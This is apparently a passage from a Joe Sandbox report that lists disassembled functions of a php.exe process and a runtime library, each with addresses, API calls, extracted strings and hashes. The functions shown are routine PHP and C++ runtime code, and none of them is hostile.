                                                • Opcode Fuzzy Hash: 117c798415cb49a4b41e6d7d1edf8e5a78bfa11e927b1eedf5904637312086ef
                                                • Instruction Fuzzy Hash: 2B515166A0CB81C1EB10BF19E4402A9B7B9FB84B94F848132DE9D47758DF3CD565C720
                                                Function 00007FF7498C35F0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 87stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ConsoleTitlefreephp_error_docrefphp_win32_cp_conv_ascii_to_wphp_win32_cp_conv_to_wphp_win32_cp_conv_utf8_to_wphp_win32_cp_get_by_idphp_win32_cp_use_unicodestrncpyzend_parse_parameters
                                                • String ID: cli_set_process_title had an error: %s
                                                • API String ID: 2486298838-2934626287
                                                • Opcode ID: d19e641eb540b8d4dfba56d625536e56f8a117182d31ae46d557ef9de871f17e
                                                • Instruction ID: 15e908702d1a89747d74b8fbf3f6a17adf4ba9e6a9eff641aaba247675a69ab4
                                                • Opcode Fuzzy Hash: d19e641eb540b8d4dfba56d625536e56f8a117182d31ae46d557ef9de871f17e
                                                • Instruction Fuzzy Hash: AE415C75A0CB42C2EB14BF19A804369E3B8AB44BA4F844236DA5E437D4DF3CE466D720
                                                Function 00007FF7498C8A60 Relevance: 22.6, APIs: 15, Instructions: 131COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$zend_hash_destroy@@8$_closeclosesocketshutdown
                                                • String ID:
                                                • API String ID: 333189319-0
                                                • Opcode ID: c8dcd6d85badb40ed42829adb42cc6458546213f88dd3f52cc9dd106571f0955
                                                • Instruction ID: ae63529b02b130b12e71ea9d83b589fb616cccc1c9819c7dd004b918d8ce7fcc
                                                • Opcode Fuzzy Hash: c8dcd6d85badb40ed42829adb42cc6458546213f88dd3f52cc9dd106571f0955
                                                • Instruction Fuzzy Hash: 06515B32A4EB4AC6EB49BF19D454678F3B8FB84B50F948136CA5E43690CF3CA4658720
                                                Function 00007FFE1A52AC60 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID:
                                                • API String ID: 2943138195-0
                                                • Opcode ID: 876faa57ff79795a5c1059d9e9be40cf01e694a924f5e3fff1249e01cfdef333
                                                • Instruction ID: 45f538526a51287d51eed70034ad33f2ab5e16f951972bb90efd33f71a8a82f3
                                                • Opcode Fuzzy Hash: 876faa57ff79795a5c1059d9e9be40cf01e694a924f5e3fff1249e01cfdef333
                                                • Instruction Fuzzy Hash: BAF15B76B0CA82DAE710DFA6D4901FC37B2AB46B5CB4040B7EA4D57AA9DF38D519C340
                                                Function 00007FFE1A522F14 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 4223619315-393685449
                                                • Opcode ID: cfe6cce2b906701a9ac1d76f761d88fce5f408b5b6504f1d048e98039d5fa770
                                                • Instruction ID: df57eedb2b18f377c8163f9978b82cd041bbf052d74f3d17380b75b9f72730d7
                                                • Opcode Fuzzy Hash: cfe6cce2b906701a9ac1d76f761d88fce5f408b5b6504f1d048e98039d5fa770
                                                • Instruction Fuzzy Hash: 75E16172B0CB41C6EB208BA6A4402BD77A5FB56BA8F1011B7EE4D57B66CF38E154C700
                                                Function 00007FFE1A52E728 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 192COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Replicator::operator[]
                                                • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                • API String ID: 3676697650-3207858774
                                                • Opcode ID: ffe630230d3b2de6161d53b0b22072a88b75348d547415f53f7225053af77ced
                                                • Instruction ID: 591b45106095138e344485507b2978cc55f88fe61f5f24c85ca952f0847a9829
                                                • Opcode Fuzzy Hash: ffe630230d3b2de6161d53b0b22072a88b75348d547415f53f7225053af77ced
                                                • Instruction Fuzzy Hash: 28918CA2B0CE86D9FB50DB62D4402B82BA2AF96B68F4440F7DE4D036A5DF3CE505D350
                                                Function 00007FF7498C1550 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: php_register_variable
                                                • String ID: DOCUMENT_ROOT$PATH_TRANSLATED$PHP_SELF$SCRIPT_FILENAME$SCRIPT_NAME
                                                • API String ID: 1046779695-3953231635
                                                • Opcode ID: ada42f3e7dc27519578163f6d10051d2743b29a48483e8c7cae096ef8e87a986
                                                • Instruction ID: bc31bd13c79feb7e921b2e9b48d0647f361a1940587dfcb1f1679ce9dc13a68c
                                                • Opcode Fuzzy Hash: ada42f3e7dc27519578163f6d10051d2743b29a48483e8c7cae096ef8e87a986
                                                • Instruction Fuzzy Hash: 77511B65A0CB46C1EB00BF09E8906B9E7B8FB89B94F804132DA5D43764DF3DD1A9D760
                                                Function 00007FFE1A528BA0 Relevance: 16.7, APIs: 11, Instructions: 159COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID:
                                                • API String ID: 2943138195-0
                                                • Opcode ID: 374c7b4445af7e25337ba4d0cee41d0a88a1d907b97d00518b00ac12b1785505
                                                • Instruction ID: 9ab2d054e24aff59bfb4fb4bec6c13c37d50a69c4c1f5b36cacb7e2dd7d9ef38
                                                • Opcode Fuzzy Hash: 374c7b4445af7e25337ba4d0cee41d0a88a1d907b97d00518b00ac12b1785505
                                                • Instruction Fuzzy Hash: C7717E72B08A46DDEB11DFA2D4401FC23B2AB55B5CB4044B3EA0D67AA9DF38D619C390
                                                Function 00007FF7498C8780 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: zend_hash_str_find@@24$php_handle_auth_dataphp_request_shutdownphp_request_startupzend_hash_index_del@@16
                                                • String ID: %s Closing$authorization$content-type
                                                • API String ID: 2965644037-1119257318
                                                • Opcode ID: bf9b3a40fa26558b88888ddeca8955892530d82cb3d68c1c3a9761658ce914bd
                                                • Instruction ID: fd3a7c4d86a0543502efa9da385fda031fcf8b6dcdf1d8ed86cb4c08cd9f308b
                                                • Opcode Fuzzy Hash: bf9b3a40fa26558b88888ddeca8955892530d82cb3d68c1c3a9761658ce914bd
                                                • Instruction Fuzzy Hash: F1811876608B86C5EB50FF2AE880668B7B8FB49B84F944136CE4D47760DF38D465D320
                                                Function 00007FFE1A52A508 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                • API String ID: 2943138195-1464470183
                                                • Opcode ID: 51d946b78c79f4e17bb7b1de47df1de08bef63135b59b13d9939b22af4cdf764
                                                • Instruction ID: 86133b403355b0c0d1311da390023f3db41122a4953e115ac4847e3a3611ae9c
                                                • Opcode Fuzzy Hash: 51d946b78c79f4e17bb7b1de47df1de08bef63135b59b13d9939b22af4cdf764
                                                • Instruction Fuzzy Hash: 60513872F0CE56D9FB10CBA6E8805BC27B2BB56BA4F5000B7DA0D57A68DF38A545C700
                                                Function 00007FF7498C3760 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: php_error_docrefzend_wrong_parameters_none_error@@0
                                                • String ID: cli_get_process_title had an error: %s
                                                • API String ID: 3457622264-425036436
                                                • Opcode ID: 7cbef4e4b1668fe422aad3086d59e105fea91ece5a33d3294b48c7803938a870
                                                • Instruction ID: e94ea878e9ea10a014aa8f1ad8d2a101ebbb6706b44deaa530b4589d0968bf05
                                                • Opcode Fuzzy Hash: 7cbef4e4b1668fe422aad3086d59e105fea91ece5a33d3294b48c7803938a870
                                                • Instruction Fuzzy Hash: CC312A75A0CB82C1EB20BF18E8643A9A3B8FB84794F844136DA5E47791DF3CE465C760
                                                Function 00007FF7498C2D80 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8$display_ini_entriesphp_info_print_modulezend_hash_str_find@@24zend_str_tolower_dup@@16
                                                • String ID: Extension '%s' not present.$main
                                                • API String ID: 2523902372-211226541
                                                • Opcode ID: b8d7647889f9b8911d59a433c18f609a5212de7f8b06cb14be5246b235cb249a
                                                • Instruction ID: 57a4e292fdc2ec25a3983aa89988e712048a114411869d92536c15329171f1d0
                                                • Opcode Fuzzy Hash: b8d7647889f9b8911d59a433c18f609a5212de7f8b06cb14be5246b235cb249a
                                                • Instruction Fuzzy Hash: CC210925A0CB46C5EB04BF1AA858638A778FB45FA0F844535EA5F037E0CF6CE024E320
                                                Function 00007FF7498C4920 Relevance: 15.2, APIs: 10, Instructions: 161COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: smart_str_erealloc@@16$memmove$_efree@@8zend_llist_get_first_exzend_llist_get_next_ex
                                                • String ID:
                                                • API String ID: 2789854044-0
                                                • Opcode ID: 08841c7943f8cd41d91fa539a54312558400a74df2f2ae6823b4dd64f9e22be0
                                                • Instruction ID: e146faba28800e6f543e5d7f5309cb3ac7c8784d7b956ce7835b486cb560f576
                                                • Opcode Fuzzy Hash: 08841c7943f8cd41d91fa539a54312558400a74df2f2ae6823b4dd64f9e22be0
                                                • Instruction Fuzzy Hash: 54715B66B18B54C5EF00AF6AD8402ADA3B5FB48FD8B844522CE1D57B98DF3CD4A1C320
                                                Function 00007FFE1A5233E0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 211107550-393685449
                                                • Opcode ID: 2d839ff92fc702e036e90624670e50b4b038d53a36dae6cd485ed0c05d9b95aa
                                                • Instruction ID: 17b815fbf543afea3dc12d376fe74938a2e556c5a25e571f811e165c4c7cdf78
                                                • Opcode Fuzzy Hash: 2d839ff92fc702e036e90624670e50b4b038d53a36dae6cd485ed0c05d9b95aa
                                                • Instruction Fuzzy Hash: 68E1A473B0CA81CAE7109FA6D4842BD7BA1FB46B68F1401B7DA8D47666CF38E585C740
                                                Function 00007FFE1A52C1F8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                • API String ID: 2943138195-2239912363
                                                • Opcode ID: ea02cf8ce8bf4896aceb1c373d4fd9d14f74077d5493258d274ba5c53a618762
                                                • Instruction ID: dd31377407b818b068fa2a7aebab5e531e54b033f3f60a7b204808424e499e87
                                                • Opcode Fuzzy Hash: ea02cf8ce8bf4896aceb1c373d4fd9d14f74077d5493258d274ba5c53a618762
                                                • Instruction Fuzzy Hash: 6C512862F0CF55C8FB118BE2E8412BD37A1BB5AB68F4445B7DA4D12A66DF3CA084C750
                                                Function 00007FF7498C7370 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 78networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ErrorLastrecv
                                                • String ID: Malformed HTTP request$Unexpected EOF$Unsupported SSL request
                                                • API String ID: 2514157807-902952500
                                                • Opcode ID: 4d9386135119999a0d3d95b8fabd9d6d67a7a8c502ed60cfec4768d0dc0ec939
                                                • Instruction ID: cfdf3e69b32ed4c2f83aced5bc4472fb5d14b75a3f2ad4324c7a4602e085be9a
                                                • Opcode Fuzzy Hash: 4d9386135119999a0d3d95b8fabd9d6d67a7a8c502ed60cfec4768d0dc0ec939
                                                • Instruction Fuzzy Hash: BA317A21A1CB82D1FB20BF29A8046A9B7B8EB85754FC00135D69D82A90DF2CE5A5C720
                                                Function 00007FFE1A5261AA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                • API String ID: 1852475696-928371585
                                                • Opcode ID: 28c61b586168f291ea3da12388abcaf5ca085dd19308925c811ceb375cbad7b4
                                                • Instruction ID: 517b4fe920719e097fa46e572d54831bb320f4f0e13795125759ba1275bba776
                                                • Opcode Fuzzy Hash: 28c61b586168f291ea3da12388abcaf5ca085dd19308925c811ceb375cbad7b4
                                                • Instruction Fuzzy Hash: 4E51606271DE86D2EE20CBA2E4805B96361FF96FA4F4045B3EA4E07A75DE3CE505C710
                                                Function 00007FFE1A526B5C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526BE1
                                                • GetLastError.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526BEF
                                                • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526C08
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526C1A
                                                • FreeLibrary.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526C60
                                                • GetProcAddress.KERNEL32(?,?,?,00007FFE1A526D1B,?,?,00000000,00007FFE1A526B4C,?,?,?,?,00007FFE1A526885), ref: 00007FFE1A526C6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                • String ID: api-ms-
                                                • API String ID: 916704608-2084034818
                                                • Opcode ID: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
                                                • Instruction ID: 5118176ca8eb9a7fbabada53860e18502a2eb45636ac7fa0b0029848f37e27fa
                                                • Opcode Fuzzy Hash: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
                                                • Instruction Fuzzy Hash: FC31AE21B1EF41C1EE16AB9398005B532A5FF8AFB0F5905B7DD1D1ABA1EF3CE5458210
                                                Function 00007FF7498C59A0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func_ctime64_s_ftime64fprintf
                                                • String ID: [%s] %s$etched$unknown
                                                • API String ID: 3974593538-288210727
                                                • Opcode ID: 711c989eaf5095a6ce6268eb38f1218eb3a9d0acb8db87d083ca41e06770af98
                                                • Instruction ID: 3468a2da99a2ad69612d919e173323284aeab03bacec63fc6d553ad373319282
                                                • Opcode Fuzzy Hash: 711c989eaf5095a6ce6268eb38f1218eb3a9d0acb8db87d083ca41e06770af98
                                                • Instruction Fuzzy Hash: B321916192DB82C5EB10BF19E440675F378EF98790FD01235EA6E427A5DF2CE0A0CB20
                                                Function 00007FFE1A522818 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
